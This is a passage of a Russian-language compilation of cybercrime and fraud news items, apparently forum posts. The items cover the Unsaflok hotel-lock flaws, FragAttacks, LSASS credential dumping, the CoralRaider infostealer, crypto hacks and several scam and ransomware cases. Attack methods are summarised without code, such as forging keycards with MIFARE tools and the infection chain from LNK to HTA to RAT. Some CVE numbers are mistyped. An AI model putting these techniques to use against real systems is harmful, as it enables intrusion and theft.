В настоящий момент уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ, с утвержденным обвинительным заключением направлено в Петроградский районный суд Санкт-Петербурга для рассмотрения по существу», - сообщила Ирина Волк.
ИсследователиWired[обнаружили](https://www.wired.com/story/saflok-hotel- lock-unsaflok-hack-technique/) уязвимости, затрагивающие более 3 млн. электронных RFID-замковSaflok, установленных в 13 000 отелях и домах 131 стране мира.
Кластер недостатков с общим названиемUnsaflok, позволяет без труда разблокировать любую дверь в отеле, подделав кей-кард.
Уязвимости были найдены группой исследователей в сентябре 2022 года во время закрытого хакерского мероприятия вЛас-Вегасе, где команды соревновались в поиске уязвимостей на всех находящихся в нем устройствах в гостиничном номере.
Этакий приватныйCTF в гостинице, в рамках которого команда исследователей сосредоточилась на поиске уязвимостей в электронном замкеSaflok на входной двери, таки раскопала бреши, которые могут открыть любую дверь в отеле.
Исследователи представили свои результаты производителюDormakaba в ноябре 2022 года, который проработал сценарии над смягчением последствий и проинформировал отели об угрозе безопасности, не предавая суть проблемы общественной огласке.
Примечательно то, что брендSaflok продавался более трех десятилетий и, возможно, был уязвим на протяжении большей части или вовсе всех этих лет.
Несмотря на то, чтоDormakaba заявляет, что ей неизвестно о каком-либо использовании техники взлома в прошлом, исследователи полагают, что когда-то это могло произойти, но без огласки.
Но сегодня исследователи впервые публично раскрыли уязвимостиUnsaflok, предупредив, что они затрагивают почти 3 миллиона дверей, использующих системуSaflok.
Для атаки достаточно прочитать одну ключ-карту с объекта и подделать рабочий мастер-ключ, который откроет любую комнату.
Поддельные ключ-карты можно создать с использованием любой картыMIFARE Classic и любого коммерчески доступного инструмента, способного записывать данные на эти карты, включаяPoxmark3, Flipper Zero или просто смартфон наAndroid с NFC.
Оборудование, необходимое для создания двух карт, использованных в атаке, стоит менее нескольких сотен долларов США.
При эксплуатации недостатков первая карта перезаписывает данные замка, а вторая открывает замок (как - показано на видео).
Несмотря на скорую реакцию поставщика после публичного раскрытия и начало глобальной замены (обновления) устройств, более 64% из них остаются уязвимыми.
Службы безопасности совместно с Нацполицией, прокуратурой и правоохранительными органами Латвийской Республики ликвидировали международную схему выманивания средств из инвесторов электронных бирж.
В результате спецоперации в Запорожье, Харькове и Днепропетровской области задержаны трое организаторов сделки.
Злоумышленники создали подпольный колл-центр, который действовал под видом одного из независимых финансовых регуляторов ЕС.
В этом «статусе» мошенники звонили европейским вкладчикам в фондовые проекты онлайн-бирж и предлагали им «защиту инвестиций».
Во время разговоров фигуранты обещали осуществить «мониторинг безопасности» электронных транзакций, а в случае их сомнительности - вернуть владельцам вложенные средства.
Стоимость таких «услуг» составляла 30% от суммы одной инвестиции.
Кроме этого, «по совету» мошенников, их жертвы должны были установить на собственных гаджетах специально разработанное мобильное приложение. Он позволял злоумышленникам полностью контролировать финансовые операции потерпевших.
Получив доступ к частным деньгам, фигуранты выводили их на собственные банковские счета и обналичивали.
Таким образом мошенники надеялись выманивать у пострадавших миллионные суммы в гривневом эквиваленте.
Однако сотрудники СБУ разоблачили злоумышленников на «старте» их преступной деятельности, задокументировали несколько фактов мошеннических манипуляций и задержали главных фигурантов.
Как установило расследование, организаторы привлекли еще семерых жителей Запорожья и Харькова. Еще один сообщник - скрывается за границей.
Во время проведения 14 одновременных обысков в помещениях мошенников изъято компьютерное и серверное оборудование, документацию, черновые записи и банковские карты с доказательствами сделки.
Сейчас трем задержанным сообщено о подозрении по ч. 4 ст. 190 Уголовного
кодекса Украины (мошенничество, совершенное в крупных размерах, или путем
незаконных операций с использованием электронно-вычислительной техники).
Злоумышленникам грозит до 8 лет тюрьмы.
Их иностранному сообщнику сообщено о заочном подозрении.
Спецоперацию проводили сотрудники СБУ в Запорожской области совместно с Департаментом стратегических расследований Национальной полиции при процессуальном руководстве Вознесеновской окружной прокуратуры Запорожья.
Роскомнадзор располагает информацией об утечке данных российских клиентов нескольких микрофинансовых организаций и принимает меры реагирования. Об этом сообщил представитель надзорного ведомства РБК. Речь идет о предполагаемом взломе инфраструктуры финтех-компании «Робофинанс», обслуживающей такие МФО, как «Займер» в России и Казахстане, «Digido» на Филиппинах и «Vietloan» во Вьетнаме.
По данным из открытых источников, в начале марта злоумышленники выложили в открытый доступ несколько баз данных с персональными сведениями заемщиков МФО, среди которых:
По заявлениям хакеров, актуальность скомпрометированных баз относится к марту 2024 года.
На сайте казахстанского «Займера» сообщается, что компания принимает меры для расследования инцидента и проверки информации. «Личные кабинеты заемщиков МФО «Робокэш.кз» надежно защищены. Информацию о банковских картах и счетах своих клиентов МФО не хранит, так как процесс выдачи микрокредита электронным способом с использованием таких данных проходит только через независимую стороннюю процессинговую компанию, которая занимается обработкой платежей», — говорится в заявлении.
Казахстанские власти сообщили о планах провести внеплановые проверки компаний, допустивших утечку данных граждан страны:
«По результатам проверок при обнаружении нарушений требований законодательства в отношении операторов баз данных будут выданы предписания об устранении выявленных нарушений, а также выписаны административные штрафы в размере от 100 до 1000 МРП в зависимости от категории субъекта и состава правонарушения», — уточняется там. МРП — это месячный расчетный показатель, применяемый для расчета штрафных санкций, налогов и других платежей в Казахстане. На 2024 год составляет 3692 тенге, то есть около 750 руб.
По данным РБК, Минцифры Казахстана также массово разослало уведомления казахстанцам, чьи данные оказались в руках злоумышленников, предупредив об угрозах со стороны мошенников.
14 марта те же злоумышленники, взломавшие Robofins, заявили , что якобы получили доступ к данным еще одной микрофинансовой организации «One Click Money» с базой почти 10 млн записей клиентов, содержащей подробные персональные данные, включая: ФИО, даты рождения, реквизиты документов, места работы, контактные данные, включая уникальные номера телефонов и электронные адреса, номера банковских карт и электронных кошельков, а также Skype-аккаунты и даты активности. Актуальность данных, по утверждению хакеров, на февраль 2024 года.
Потерпевшие лишились не только собственных накоплений, но еще и оформили
кредит.
Началось все со звонка якобы из «Центробанка» в мессенджере 23-летнему
горожанину.
Незнакомец сообщил мужчине, что кто-то пытается оформить на его имя кредит и убедили горожанина перевести имеющиеся у него денежные средства - 338 тысяч рублей на пресловутый «безопасный счет».
Далее молодой человек оформил займ на сумму 280 тысяч, которые тоже перевел мошенникам.
На этом общение с «банкирами» не прекратилось. От молодого мужчины аферисты узнали, что у его бабушки тоже имеются накопления и настоятельно рекомендовали «обезопасить» и их... Бабушка тоже поверила мошенникам.
Теперь расследованием преступления занимаются полицейские.
Выпускающая стейблкоин USDT компания Tether заблокировала около $225 млн в USDT в рамках сотрудничества с Минюстом США, криптовалютной биржей OKX и аналитической фирмой Chainalysis.
Согласно пресс-релизу, средства связаны с международным преступным синдикатом, занимавшемся торговлей людьми в Юго-Восточной Азии. Объем замороженных USDT в Tether назвали «крупнейшим в истории».
«В ходе многомесячного расследования, проведенного Tether и OKX, правоохранительные органы США, включая Министерство юстиции, были заранее предупреждены о местонахождении незаконных средств путем анализа их движения через блокчейн. Эти действия повлекли за собой запрос на заморозку со стороны Секретной службы США и [последующую] добровольную блокировку со стороны Tether», — уточнили в компании.
Назначенный на должность CEO эмитента Паоло Ардоино назвал проведенную работу «впечатляющей».
«Мы верим в необходимость использования технологий и связей, таких как наше сотрудничество с OKX, для активного противодействия незаконной деятельности и поддержания самых высоких стандартов честности в отрасли», — добавил Ардоино.
Ранее Tether заморозила более 2,5 млн USDT, выведенных из кроссчейн-протокола Multichain. В сентябре эмитент заблокировал $1,4 млн из украденных у биржи Remitano $2,7 млн.
Сотрудники Федерального бюро расследований США не стали сворачивать деятельность сервиса, который помогал выводить криптовалюту в фиат (такая деятельность противозаконна в стране, так как требует дорогостоящего лицензирования). Вместо этого следователи, вычислив одного из посредников в обнале, уже с его помощью продолжили проводить обменные операции, пополняя свою базу нарушающих закон американцев.
По делу арестованы шесть человек, все — уроженцы Индии. Придуманный ими сервис принимал криптовалютные платежи у клиентов, а живые деньги или отправлялись почтой, или даже передавались из рук в руки. Просуществовал стартап ровно полтора года, пока на него не обратили внимание в ФБР, а его руководители не были арестованы в Нью-Йорке.
Известно, что группировку накрыли, установив личность человека, который упаковывал и отправлял деньги почтой. Его уговорили сотрудничать со следствием, после чего он признался, что несколько раз в неделю ему приходилось упаковывать от 100 тысяч до 300 тысяч долларов. За те несколько месяцев, в течении которых этот человек работал с полицией, силовики изъяли более двух миллионов долларов. Всего же за время существования сервиса через него были отмыты более 30 миллионов долларов.
Именно перебои в отправлениях вынудили руководителей сервиса задуматься о том, что у них проблемы. Однако скрыться они уже не успели и были арестованы во время личной передачи крупной суммы.
source: 404media.co/inside-a-30-million-cash-for-bitcoin-laundering-ring-in- the-heart-of-new-york
Несовершеннолетние курьеры телефонных мошенников в Минске подрабатывали "спортиками".
Сотрудники наркоконтроля Первомайского РУВД с поличным задержали двоих 17-летних одноклассников. Парни пытались забрать Br70 тыс. у пожилой жертвы телефонных мошенников.
Проверка показала, что днем ранее по заданию куратора наркошопа фигуранты напали на мужчину, который присвоил себе товар. Школьники привязали закладчика к дереву, облили зеленкой, избивали и угрожали. Все происходящее они фиксировали на видео для отчета перед нанимателем.
Следователи возбудили уголовные дела за мошенничество и угрозу убийством.
Произошел крупнейший взлом в истории децентрализованных децентрализованных финансов
Неизвестный хакер украл криптовалюты на сумму около 625 миллионов из блокчейна Ronin, лежащего в основе популярной криптоигры Axie Infinity . Оператор Ronin и Axie Infinity Sky Mavis во вторник раскрыл брешь и заморозили транзакции на кроссчейн-мосту Ronin, который позволяет вносить и выводить средства из блокчейна компании.
По наблюдениям исследователя The Block Research Игоря Игамбердиева, часть средств поступила на централизованные биржи FTX и Crypto.com.
Хакеру удалось заполучить 173 600 ETH (в настоящее время стоит около 600
миллионов долларов), а также стейблкоины USDC (криптовалюта, привязанная к
доллару США) общей стоимостью $25,5 млн.
В блоге проекта говорится, что злоумышленник воспользовался уязвимостью еще 23
марта. Для реализации атаки ему удалось получить контроль над пятью из девяти
валидаторов.
«Команда Sky Mavis обнаружила брешь в системе безопасности 29 марта после сообщения о том, что пользователь не смог вывести 5000 ETH из моста», — написали разработчики.
Sky Mavis говорит, что токены NFT «акси», которые игроки должны купить для доступа к Axie Infinity, не были скомпрометированы, равно как и внутриигровые криптовалюты SLP и AXS, используемые для борьбы и разведения покемоноподобных мультяшных аксолотлей.
Cудьба средств других пользователей на блокчейне Ronin под вопросом. Sky Mavis заявляет, что «сотрудничает с представителями правоохранительных органов, судебными криптографами и инвесторами, чтобы гарантировать отсутствие потери средств пользователей», называя это своим «высшим приоритетом».
На данный момент взлом Ronin, по-видимому, является крупнейшим на сегодняшний день взломом сетей «децентрализованных финансов», произошедшим вслед за кражей 322 миллионов долларов из мостового протокола Wormhole в прошлом месяце. Подобный инцидент произошел в прошлом году с проектом Poly Network. Хакер вывел $611 млн, однако впоследствии вернул все средства.
source: roninblockchain.substack.com/p/community-alert-ronin-validators?s=w
Microsoft решила усложнить задачу злоумышленникам, пытающимся вытащить учётные
данные пользователей Windows с помощью процесса LSASS. Для этого разработчики
активировали правило «Attack Surface Reduction» по умолчанию. Когда
киберпреступникам удаётся проникнуть в сеть организации, они стараются
продвинуться латерально, используя украденные логины и пароли, а также
эксплойты. Один из наиболее популярных методов атакующих — повысить права до
уровня администратора и получить дамп памяти системного процесса Local
Security Authority Server Service (LSASS). В этот дамп попадают хешированные
NTLM учётные данные пользователей Windows. В результате злоумышленники могут
либо провести брутфорс и получить логины и пароли в виде простого текста, либо
использовать атаку Pass-the-Hash, чтобы войти в аккаунты на других устройствах
в сети.
Пример снятия дампа программой Mimikatz приводит издание BleepingComputer:
В Microsoft понимали, что с этим вектором атаки надо как-то бороться. Поэтому разработчики представили защитные функции, запрещающие доступ к процессу LSASS. Одна из этих функций, получившая имя Credential Guard, изолирует процесс LSASS и помещает его в виртуальный контейнер, запрещая таким образом доступ других процессов к нему. Тем не менее у этой функции есть и свои минусы. Например, некоторые организации могут отказаться от её использования, поскольку Credential Guard в отдельных случаях приводит к конфликтам с драйверами и приложениями. Чтобы избежать проблем на стороне пользователя, Microsoft планирует активировать правило Attack Surface Reduction (ASR) по умолчанию.
Code:Copy to clipboard
«Это правило блокирует кражу учётных данных из подсистемы Windows lsass.exe», — так описывают разработчики ASR.
Источник: https://www.anti-malware.ru/news/2022-02-14-111332/38167
Мэти Ванхофом (Mathy Vanhoef), автор атаки KRACK на беспроводные сети, раскрыл сведения о 12 уязвимостях, затрагивающих различные беспроводные устройства. Выявленные проблемы представлены под кодовым именем FragAttacks и охватывают практически все находящиеся в обиходе беспроводные платы и точки доступа - из протестированных 75 устройств, каждое было подвержено как минимум одному из предложенных методов атаки.
Проблемы разделены на две категории: 3 уязвимости выявлены непосредственно в стандартах Wi-Fi и охватывают все устройства, поддерживающие актуальные стандарты IEEE 802.11 (проблемы прослеживаются с 1997 года). 9 уязвимостей касаются ошибок и недоработок в конкретных реализациях беспроводных стеков. Основную опасность представляет вторая категория, так как организация атак на недоработки стандартов требует наличия специфичных настроек или выполнения жертвой определённых действий. Все уязвимости проявляются независимо от использования протоколов для обеспечения безопасности Wi-Fi, в том числе при использовании WPA3.
Большинство выявленных методов атак позволяют злоумышленнику осуществить подстановку L2-кадров в защищённой сети, что даёт возможность вклинится в трафик жертвы. В качестве наиболее реалистичного сценария атак упоминается подмена ответов DNS для направления пользователя на хост атакующего. Также приводится пример использования уязвимостей для обхода транслятора адресов на беспроводном маршрутизаторе и организации прямого доступа к устройству в локальной сети или игнорирования ограничений межсетевого экрана. Вторая часть уязвимостей, которая связанна с обработкой фрагментированных кадров, даёт возможность извлечь данные о трафике в беспроводной сети и перехватить данные пользователя, передаваемые без использования шифрования.
Исследователем подготовлена демонстрация, показывающая как можно использовать уязвимости для перехвата пароля, переданного при обращении к сайту по протоколу HTTP без шифрования, Так же показано как атаковать умную розетку, управляемую через Wi-Fi, и использовать её в форме плацдарма для продолжения атаки на необновлённые устройства в локальной сети, имеющие неисправленные уязвимости (напирмер, удалось через обход NAT атаковать необновлённый компьютер с Windows 7 во внутренней сети).
Для эксплуатации уязвимостей атакующий должен находиться в пределах досягаемости целевого беспроводного устройства, чтобы отправить жертве специально оформленный набор кадров. Проблема затрагивает как клиентские устройства и беспроводные карты, так и точки доступа и Wi-Fi маршрутизаторы. В общем виде в качестве обходных мер защиты достаточно использования HTTPS в сочетании с шифрованием DNS-трафика при помощи DNS over TLS или DNS over HTTPS. Для защиты также подходит применение VPN.
Наиболее опасными называются четыре уязвимости в реализациях беспроводных устройств, позволяющие тривиальными методами добиться подстановки своих незашифрвоанных кадров в сети, в которой применяется шифрование.
• Уязвимости CVE-2020-26140 и CVE-2020-26143 допускают подстановку кадров на некоторых точках доступа и беспроводных картах в Linux, Windows и FreeBSD.
• Уязвимость VE-2020-26145 допускает обработку широковещательных незашифрвоанных фрагментов как полноценных кадров в macOS, iOS и FreeBSD и NetBSD.
• Уязвимость CVE-2020-26144 допускает обработку незашифрованных пересобранных кадров A-MSDU с EtherType EAPOL в Huawei Y6, Nexus 5X, FreeBSD и LANCOM AP.
Другие уязвимости в реализациях в основном связаны с проблемами, возникающими при обработке фрагментированных кадров:
• CVE-2020-26139: перенаправление кадров с флагом EAPOL, отправленных неаутентифицированным отправителем (затрагивает 2/4 проверенных точек доступа, а также решения на базе NetBSD и FreeBSD).
• CVE-2020-26146: допускает пересборку (reassembling) зашифрованных фрагментов с непоследовательно следующими номерами последовательности.
• CVE-2020-26147: допускает пересборку смешанных шифрованных и нешифрованных фрагментов.
• CVE-2020-26142: позволяет обрабатывать фргментированные кадры как полные кадры (затрагивает OpenBSD и беспроводной модуль ESP12-F).
• CVE-2020-26141: отсутствует проверка TKIP MIC для фрагментированных кадров.
Проблемы в спецификациях:
• CVE-2020-24588 - атака на агрегированные кадры (флаг "is aggregated" не защищён и может быть заменён атакующим в кадрах A-MSDU в WPA, WPA2, WPA3 и WEP). В качестве примера применения атаки упоминается перенаправление пользователя на вредоносный DNS-сервер или обход NAT.
• CVE-2020-245870 - атака на смешивание ключей (допускается пересборка фрагметов, зашифрованных с использованием разных ключей в WPA, WPA2, WPA3 и WEP). Атака позволяет определить данные, отправленные клиентом, например, определить содержимое Cookie при обращении по HTTP.
• CVE-2020-24586 - атака на кэш фрагментов (стандарты, охватывающие WPA, WPA2, WPA3 и WEP, не требуют удаление уже осевших в кэше фрагментов после нового подключения к сети). Позволяет определить данные, отправленные клиентом, и осуществить подстановку своих данных.
Для тестирования степени подверженности проблемам своих устройств подготовлен специальный инструментарий и готовый Live-образ для создания загрузочного USB-накопителя. В Linux проблемы проявляются в беспроводном сетке mac80211, в отдельных беспроводных драйверах и в прошивках, загружаемых на беспроводные платы. Для устранения уязвимостей предложен набор патчей, охватывающих стек mac80211 и драйверы ath10k/ath11k. Для некоторых устройств, таких как беспроводные карты Intel, дополнительно требуется установка обновления прошивки.
Тесты типовых устройств:
Тесты беспроводных карт в Linux и Windows:
Тесты беспроводных карт во FreeBSD и NetBSD:
Производители были уведомлены о проблемах ещё 9 месяцев назад. Столь длительный период эмбарго объясняется скоординированной подготовкой обновлений и задержками при подготовке организациями ICASI и Wi-Fi Alliance изменений спецификаций. Изначально планировалось раскрыть сведения 9 марта, но сопоставив риски было решено отложить публикацию ещё на два месяца для того, чтобы дать больше времени на подготовку патчей с учётом нетривиальности вносимых изменений и трудностей, возникающих из-за пандемии COVID-19.
Примечательно, что несмотря на эмбарго компания Microsoft в мартовском обновлении Windows досрочно устранила некоторые уязвимости. Раскрытие информации было отложено за неделю до изначально намеченного срока и компания Microsoft не успела или не захотела вносить изменения в готовое для публикации обновление, чем создала угрозу для пользователей других систем, так как злоумышленники могли получить информацию об уязвимостях через проведение обратного инжиниринга содержимого обновлений.
Создатель сервиса Have I Been Pwned Трой Хант использует домены закрытого в 2019 году криптоджекингового сервиса Coinhive, чтобы предупреждать пользователей о сайтах, которые все еще занимаются скрытым майнингом.
Напомню, что Coinhive появился осенью 2017 года и тогда позиционировался как альтернатива классической баннерной рекламе. В итоге же Coinhive лишь породил масштабное явление, которое ИБ-специалисты назвали криптоджекингом, или браузерным майнингом. Пользователям стало достаточно «неудачно» зайти на какой-либо сайт, в код которого встроен специальный JavaScript Coinhive (или другого аналогичного сервиса, коих вскоре появились десятки), и ресурсы машин жертв уже использовались для добычи криптовалюты Monero. Хотя операторы Coinhive признавались, что совсем не желали создавать инструмент для обогащения киберпреступников и прямо осуждали действия злоумышленников.
На пике своей популярности Coinhive был внедрен в 200 000 маршрутизаторов, в расширения для браузера, в приложения из Microsoft Store и даже на правительственные сайты.
Однако в конечном итоге, весной 2019 года сервис закрылся года после хардфорка Monero, так как хэшрейт упал более чем на 50%. Кроме того, на решение разработчиков Coinhive повлиял общий «обвал» криптовалютного рынка, так как тогда XMR потеряла около 85% стоимости.
Как теперь рассказывает в блоге основатель агрегатора утечек Have I Been Pwned (HIBP) Трой Хант, ему бесплатно предоставили доступ к coinhive.com и другим связанным доменам, при условии, что он сделает с ними что-то полезное:
«В мае 2020 года я получил контроль как над основными доменом coinhive.com, так и над несколькими другими вспомогательными доменами, связанными с сервисом, например cnhv.co, который использовался для сокращения ссылок (что тоже заставляло браузеры майнить Monero).
Я не уверен, насколько человек, который предоставил мне эти домены, хочет публичности, поэтому единственное, что я сейчас скажу: они были предоставлены мне бесплатно, чтобы сделать что-то полезное».Click to expand...
Так как домены размещаются за Cloudflare, Хант использовал встроенную аналитику и обнаружил, что огромное количество посетителей все еще пытается загрузить JavaScript с Coinhive.

Анализируя сайты, которые по-прежнему направляют трафик на домены Coinhive, Хант заметил, что скрипты активны в основном на сайтах Китая и России. Большая часть этого трафика может быть связана с взломанными маршрутизаторами MikroTik, которые продолжают внедрять скрипты Coinhive, когда пользователи посещают любые сайты.
В итоге эксперт решил, что использует домен coinhive.com, чтобы перенаправлять людей на свой пост в блоге, посвященный Coinhive. Так, если люди посещают сайты со скриптами Coinhive, они видят диалоговое окно, которое предупредит их: «Этот сайт попытался запустить криптомайнер в вашем браузере». Причем предупреждение — это ссылка, по которой пользователи могут кликнуть и узнать о Coinhive больше.

Хотя Хант делает доброе дело, пример Coinhive наглядно показывает, что злоумышленники могут использовать заброшенные домены для внедрения скриптов в браузеры ничего не подозревающих посетителей.
«Теперь я могу запускать любой JavaScript, который захочу, на огромном количестве сайтов. Итак, что я мог бы сделать с JavaScript? Я мог бы внести изменения в работу форм, внедрить кейлоггер, изменить DOM, осуществлять внешние запросы, перенаправить [посетителей] к вредоносными файлам и делать другие неприятные вещи.
Именно такую власть вы даете [посторонним], когда встраиваете чужой JS на свой сайт, и именно за этим нужна целостность субресурсов», — предупреждает Хант.Click to expand...
Источник: xakep.ru/2021/04/02/coinhive-for-the-greater-good/
В Австралии 24-летняя Кэтрин Коливас похитила члена королевской семьи Саудовской Аравии. Для освобождения девушка запросила $40 000 в биткоинах. Об этом сообщает [Daily Mail](https://www.dailymail.co.uk/news/melbourne/article-14196073/TikTok- kidnapper-Catherine-Colivas-bitcoin.html).
Согласно материалам дела, Коливас и трое ее сообщников нашли жертву в приложении для знакомств, организовав свидание. После встречи женщина попросила спутника проводить ее до дома, где поджидали подельники.
Затем королевскую особу избили, связали кабельными стяжками и угрожали отрезать пальцы ножом.
Похищенный оказался криптотрейдером, поэтому расплатился за свою свободу биткоинами на сумму около $40 000, которые перевел через друга. Преступники также украли ключи от дома члена королевской семьи, откуда вынесли дизайнерскую одежду, Playstation 5 и несколько iPhone.
После этого потерпевшего отпустили. Он немедленно обратился в полицию и отправился в госпиталь с ранами на голове и запястьях.
Коливас признала себя виновной в похищении, вымогательстве, безрассудном нанесении телесных повреждений, краже и хранении оружия. Ей грозило максимальное наказание в виде 25 лет тюрьмы. Однако суд Австралии назначил лишь 30 месяцев исправительных работ.
Судья постановил, что Коливас доказала наличие «исключительных обстоятельств», которые по закону необходимы освобождения от тюремного заключения. К этим причинам относятся: юный возраст, трудное детство, слабое психическое здоровье, перспективы реабилитации и смерть ее брата в ходе слушаний по делу.
Другие организаторы инцидента тоже не получили реальных сроков, принеся «искренние извинения» потерпевшему.
Согласно новому отчету Cisco Talos, вьетнамские хакеры с мая 2023 года распространяют новый инфостилер с целью заполучить финансовые данные. Кампания получила название CoralRaider и затронула жертв в Индии, Китае, Южной Корее, Бангладеш, Пакистане, Индонезии и Вьетнаме.
Целью злоумышленников является кража учётных данных пользователей, финансовой информации и аккаунтов в социальных сетях, включая аккаунты для бизнеса и рекламы. Для достижения своих целей хакеры используют RotBot (модифицированный вариант трояна Quasar RAT) и инфостилер XClient. Также в арсенале атакующих присутствуют AsyncRAT, NetSupport RAT и Rhadamanthys.
Особое внимание уделяется аккаунтам бизнеса и рекламы. После их кражи с помощью Ducktail и NodeStealer киберпреступники монетизируют учетные записи. Данные с компьютеров жертв экспортируются через Telegram и продаются на черном рынке.
Цепочка атаки начинается с распространения LNK-ярлыка. На данный момент специалисты не знают, как именно ярлыки доставляются на компьютеры жертв. Открытие LNK-файла приводит к загрузке и выполнению HTML-приложения (HTA) с сервера атакующих. Приложение запускает скрипты, отключающие систему безопасности и загружающие RotBot.
RotBot предназначен для установления связи с Telegram-ботом, доставки инфостилера XClient и выполнение его в памяти, что в конечном итоге приводит к созданию скриншотов, краже cookie-файлов, учетных данных и финансовой информации из различных браузеров, а также из Discord и Telegram.
XClient также предназначен для эксфильтрации данных из учетных записей жертв в Facebook*, Instagram*, TikTok и YouTube, собирая подробную информацию о способах оплаты и разрешениях, связанных с бизнес-аккаунтами и рекламными аккаунтами в Facebook.
Исследователи утверждают, что операторы CoralRaider базируются во Вьетнаме, что подтверждается сообщениями в их Telegram-каналах и предпочтением вьетнамского языка при именовании ботов и в коде вредоносных программ.
sc: blog.talosintelligence.com/coralraider-targets-socialmedia-accounts
Расследование показало, какие онлайн-преступления принесли $100 млн. мошенническому синдикату Мьянмы.
Исследователи выявили, что недавно построенная «фабрика мошенничества» на границе Мьянмы и Таиланда заработала почти $100 млн. за менее чем 2 года. Подробности о деятельности онлайн-преступников были раскрыты в ходе совместного расследования сервиса Chainalysis и правозащитной организации International Justice Mission.
Расположение KK Park и часть построенного квартала
Фабрика мошенничества и центр торговли людьми KK Park (КК Парк), расположенная вдоль реки Моэй на границе с Тайландом, представляет собой зону, где, как сообщается, тысячи работников удерживаются против своей воли. Сотрудники фабрики вынуждены заниматься мошенничеством типа The Pig Butchering Scam – афера, при которой мошенник в ходе онлайн-переписки входит в доверие жертвы, а затем обманным путем убеждает её совершать фиктивные инвестиции.
Расследование началось после того, как International Justice Mission (IJM) предоставила Chainalysis 2 адреса криптокошельков, которые, по словам IJM, связаны с китайской подставной компанией, работающей в KK Park. С момента создания кошельков в июле 2022 года мошенники переводили на них средства, заработанные в ходе онлайн-преступлений. Часть поступлений, вероятно, происходит из операций, связанных с мошенничеством на сайтах знакомств. Также отмечается, что на эти адреса семьи похищенных людей должны были переводить выкуп за их освобождение, каждый из которых превышал $30 000.
Chainalysis отмечает, что данные адреса лишь вершина айсберга в деятельности мошенников из КК Парк, подчеркивая тесную связь операций по вымогательству выкупа с основной деятельностью по проведению романтических афер (romance scam). Также подчеркивается, что стейблкоин Tether (USDT) играет ключевую роль в подпитке экономики мошенничества в Юго-Восточной Азии, став одной из наиболее популярных криптовалют, используемых организованными преступными группировками.
Напомним, что с лета 2023 года Китай настойчиво требовал от властей Мьянмы принять жесткие меры против многочисленных анклавов кибермошенников, действующих в приграничных районах. Поводом стала волна махинаций с использованием схемы «забоя свиней» (pig butchering), жертвами которых становились граждане КНР. Деятельность преступных анклавов в приграничных районах Мьянмы опиралась на использование принудительного труда людей, незаконно завезенных туда из соседних стран.
Также отметим, что Коалиция повстанческих группировок в Мьянме недавно успешно взяла под контроль город Лауккай, известный как крупный центр кибермошенничества в данном регионе, от которого страдали страны, в том числе граничащие с Мьянмой. Коалиция повстанцев чётко обозначила свою цель — искоренение организованных мошеннических операций, распространявшихся под чутким присмотром местных правоохранителей, верных правящей хунте.
sc: chainalysis.com/blog/pig-butchering-human-trafficking
В небольшом австрийском городе Корнойбург, расположенном на берегах Дуная, недавно произошло чрезвычайное происшествие, вызвавшее значительные нарушения в работе местной администрации.
Городской совет сообщил о масштабной атаке программ-вымогателей, в результате которой была зашифрована вся хранящаяся администрацией информация, включая резервные копии данных. В связи с этим были отменены все запланированные похороны из-за невозможности выдать свидетельства о смерти, что является обязательным условием для проведения захоронений в Австрии.
По информации местных СМИ, власти города получили требования злоумышленников об уплате выкупа. Заместитель мэра Гелене Фукс-Мозер подчеркнула , что «всё остановилось», в том числе и возможность печатать официальные документы, такие как регистрационные формы или счета. Она также сообщила, что муниципалитет не собирается выплачивать выкуп.
Инцидент был обнаружен менеджером IT-отдела города в ночь на 2 февраля, когда он получил сообщение о необычной активности в системе данных. «Я сразу же проверил и обнаружил, что всё зашифровано», — рассказал Кристофер Кремлицка.
В заявлении на сайте муниципалитета уточняется, что технический отдел прилагает максимум усилий для решения проблемы и обеспечения безопасности данных власти. Власти уже сообщили о случившемся в местную полицию.
Заместитель мэра также отметила, что в декабре прошлого года системы безопасности города были проверены и получили сертификацию о соответствии стандартам безопасности. Однако, по её словам, «преступники всегда на шаг впереди».
Этот инцидент стал ещё одним напоминанием о том, как важно не только регулярно обновлять меры по обеспечению кибербезопасности, но и быть готовыми к неожиданным угрозам, способным серьёзно нарушить повседневную жизнь города и его жителей.
sc: korneuburg.gv.at/Cyberangriff_auf_Stadtgemeinde
34-летний американец по имени Делано Буш из города Саутфилд, штат Мичиган, недавно признал свою вину касательно участия в многомиллионном мошенничестве с использованием мобильных телефонов. Группировка, назвавшая себя «Clear Gods», использовала украденные личные данные жертв для покупки тысяч новых телефонов в кредит.
Согласно заявлению американского прокурора Доун Н. Айсон, в рамках обнаруженной аферы было совершено более 26 тысяч мошеннических транзакций, что привело к суммарным убыткам на более 28 миллионов долларов.
С июня 2017 года по сентябрь 2019 года Буш и его сообщники незаконно получали личные данные жертв, формировали на их основе договора с провайдером связи AT&T и покупали мобильные устройства в кредит. Буш признал свою вину 6 декабря, буквально пару дней назад.
Прокурор Айсон отметила: «Признание вины является значительным событием в этом многолетнем расследовании. Как показывает дело, кража личных данных постоянно эволюционирует, и мошенники находят всё новые способы использовать и злоупотреблять личной информацией жертв».
Бушу грозит максимальное законодательное наказание до 20 лет тюремного заключения за сговор с целью совершения мошенничества. Согласно соглашению о признании вины, мужчина будет обязан выплатить компенсацию компании AT&T в размере не менее 1,5 миллиона долларов. Дата вынесения приговора назначена на 25 апреля 2024 года.
Как сообщается, участники «Clear Gods» сначала покупали утекшую личную информацию в различных источниках, в том числе на так называемых «интернет- свалках», а затем использовали её для открытия сотовых счетов в AT&T. После прохождения проверки кредитоспособности они добавляли себя или своих сообщников в качестве «авторизованных пользователей» на мошеннические счета и приобретали устройства, записанные в счёт жертв, чьи данные были украдены.
Нередко для успешного заключения договоров с провайдером злоумышленники пользовались услугами коррумпированных сотрудников AT&T или даже сами выдавали себя за сотрудников сети, похищая рабочие планшеты из офисов розничных продаж AT&T.
Затем преступники посещали различные розничные магазины, в основном Apple, в разных штатах страны для так называемого «обновления услуг», приобретая новые устройства в счёт мошеннических счетов. После чего преступники аннулировали кредитные обязательства с используемых аккаунтов, в том числе с помощью доступа к сети AT&T, а затем повторяли процедуру уже в другом розничном магазине.
Специальный агент Отдела внутренней безопасности (HSI) в Детройте Энджи М. Салазар отметила: «Сотрудничество между федеральными, государственными и местными партнёрами необходимо для успешного расследования и преследования этих сложных операций по мошенничеству. Останавливая эти схемы, специальные агенты HSI и наши партнёры помогают защитить средства к существованию трудолюбивых американцев как здесь, в Мичигане, так и по всей стране».
• Source: https://www.justice[.]gov/usao-edmi...t-plead-guilty-28000000-cell- fraud-conspiracy
